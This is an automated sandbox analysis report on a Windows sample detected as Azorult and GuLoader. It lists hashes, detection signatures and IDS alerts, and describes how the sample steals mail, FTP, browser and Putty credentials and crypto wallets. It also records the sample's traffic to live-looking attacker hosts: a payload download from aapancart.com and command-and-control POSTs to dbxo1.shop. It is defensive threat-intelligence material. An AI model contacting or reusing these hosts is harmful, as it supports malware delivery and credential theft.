Windows Analysis Report
Swift Mesaj#U0131#09971.exe

Overview

General Information

Sample Name: Swift Mesaj#U0131#09971.exe
Analysis ID: 755179
MD5: 310df09294b852bab67e158d95788150
SHA1: 9b69175fcbcc718212d21a77d39969309e9787f8
SHA256: d27bf1156e1a463ebada17bac3b3a314835cead7e75c4770c95ff21f06e00310

Detection

Azorult, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Self deletion via cmd or bat file
Tries to harvest and steal ftp login credentials
Tries to harvest and steal Bitcoin Wallet information
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Queries information about the installed CPU (vendor, model number etc)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection

Source: Swift Mesaj#U0131#09971.exe Virustotal: Detection: 10%
Source: Swift Mesaj#U0131#09971.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fivefoldness\Endosseringerne\Fouragen
Source: unknown HTTPS traffic detected: 103.14.99.114:443 -> 192.168.11.20:49834 version: TLS 1.2
Source: Swift Mesaj#U0131#09971.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.4.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7971951549.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8014829170.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019922656.000000001E6F4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020103114.000000001E6F8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7986103075.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020892239.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020774715.000000001DA8C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018771752.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018902003.000000001E6B8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019101053.000000001E6BC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.4.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7976244573.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.4.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7997374379.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7998188833.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.4.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019922656.000000001E6F4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020444307.000000001E700000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020103114.000000001E6F8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016323485.000000001E674000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016445473.000000001E678000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7969234016.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016567401.000000001E67C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7968362187.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016323485.000000001E674000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016445473.000000001E678000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7968362187.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7983291992.000000001DD14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019749617.000000001E6E4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7982644058.000000001DD10000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020249501.000000001DA70000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020696835.000000001DA80000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7990657320.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7989641253.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.4.dr
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_004065C5 FindFirstFileW,FindClose, 1_2_004065C5
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405990
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_00402862 FindFirstFileW, 1_2_00402862

Networking

Source: Traffic Snort IDS: 2029468 ET TROJAN Win32/AZORult V3.3 Client Checkin M15 192.168.11.20:49836 -> 172.67.203.65:80
Source: Traffic Snort IDS: 2029137 ET TROJAN AZORult v3.3 Server Response M2 172.67.203.65:80 -> 192.168.11.20:49836
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /rufZpHlxPMyoMZPqPua74.rar HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: aapancart.com
Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /db1/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: dbxo1.shop
Content-Length: 113
Cache-Control: no-cache
Data Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 17 8b 30 6d 8b 30 60 8b 30 6c 8b 30 65 8b 30 63 8b 30 60 8b 30 61 8b 31 11 8b 30 66 8b 30 67 ec 45 14 8b 30 65 8b 30 6c 8b 30 60
Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpG0m0`0l0e0c0`0a10f0gE0e0l0`
Source: global traffic HTTP traffic detected: POST /db1/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: dbxo1.shop
Content-Length: 32686
Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: HTTPS://LOGIN.LIVE.COM/
Source: Swift Mesaj#U0131#09971.exe, nss3.dll.4.dr, nssdbm3.dll.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Swift Mesaj#U0131#09971.exe, nss3.dll.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: Swift Mesaj#U0131#09971.exe String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Swift Mesaj#U0131#09971.exe String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Swift Mesaj#U0131#09971.exe, nss3.dll.4.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Swift Mesaj#U0131#09971.exe, nss3.dll.4.dr, nssdbm3.dll.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: Swift Mesaj#U0131#09971.exe, nss3.dll.4.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: Swift Mesaj#U0131#09971.exe, nss3.dll.4.dr, nssdbm3.dll.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, 
Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dbxo1.shop/
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dbxo1.shop/db1/index.php
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dbxo1.shop/db1/index.phpC
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dbxo1.shop/db1/index.phpft
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8078319161.000000001D460000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://dbxo1.shop/db1/index.phpl
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dbxo1.shop/db1/index.phpp
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dbxo1.shop/nr
Source: Swift Mesaj#U0131#09971.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: mozglue.dll.4.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060357272.000000000183A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aapancart.com/
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060357272.000000000183A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aapancart.com/rufZpHlxPMyoMZPqPua74.rar
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060357272.000000000183A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aapancart.com/rufZpHlxPMyoMZPqPua74.rar0
Source: 492576258725572177298999.tmp.4.dr String found in binary or memory: https://login.live.com/
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8032929783.00000000018C6000.00000004.00000020.00020000.00000000.sdmp, 492576258725572177298999.tmp.4.dr String found in binary or memory: https://login.live.com//
Source: 492576258725572177298999.tmp.4.dr String found in binary or memory: https://login.live.com/https://login.live.com/
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8032929783.00000000018C6000.00000004.00000020.00020000.00000000.sdmp, 492576258725572177298999.tmp.4.dr String found in binary or memory: https://login.live.com/v104
Source: unknown HTTP traffic detected: POST /db1/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: dbxo1.shop Content-Length: 113 Cache-Control: no-cache Data Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 17 8b 30 6d 8b 30 60 8b 30 6c 8b 30 65 8b 30 63 8b 30 60 8b 30 61 8b 31 11 8b 30 66 8b 30 67 ec 45 14 8b 30 65 8b 30 6c 8b 30 60 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpG0m0`0l0e0c0`0a10f0gE0e0l0`
Source: unknown DNS traffic detected: queries for: aapancart.com
Source: global traffic HTTP traffic detected: GET /rufZpHlxPMyoMZPqPua74.rar HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: aapancart.com Cache-Control: no-cache
Source: unknown HTTPS traffic detected: 103.14.99.114:443 -> 192.168.11.20:49834 version: TLS 1.2
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 1_2_00405425

System Summary

Source: 4.2.Swift Mesaj#U0131#09971.exe.1e2ce63c.3.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 4.2.Swift Mesaj#U0131#09971.exe.1e2c94d2.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 4.2.Swift Mesaj#U0131#09971.exe.1e2c38e3.4.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
